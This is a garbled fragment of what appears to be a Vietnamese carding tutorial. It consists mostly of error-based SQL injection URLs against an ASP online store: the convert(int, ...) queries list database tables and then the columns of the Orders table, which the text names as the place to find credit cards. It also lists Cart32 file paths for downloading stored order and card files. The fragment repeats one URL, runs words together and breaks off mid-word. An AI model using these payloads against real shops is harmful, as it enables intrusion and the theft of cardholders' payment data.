... http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','ItemGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Secure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses'))) ... http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','ItemGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Secure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses'))) sp_passwordCC thường chứa trong các table Orders hay creditcard, ở đây tôi chọn Orders để hack. Lấy Column đầu tiênhttp://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders'))) ... khóa "Cart32.exe v3"đầu tiên vàohttp://www.sitename.com/cgi-bin/cart32.exe/sitenameLấy Credit Cards :http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txthoặc :http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txtVí...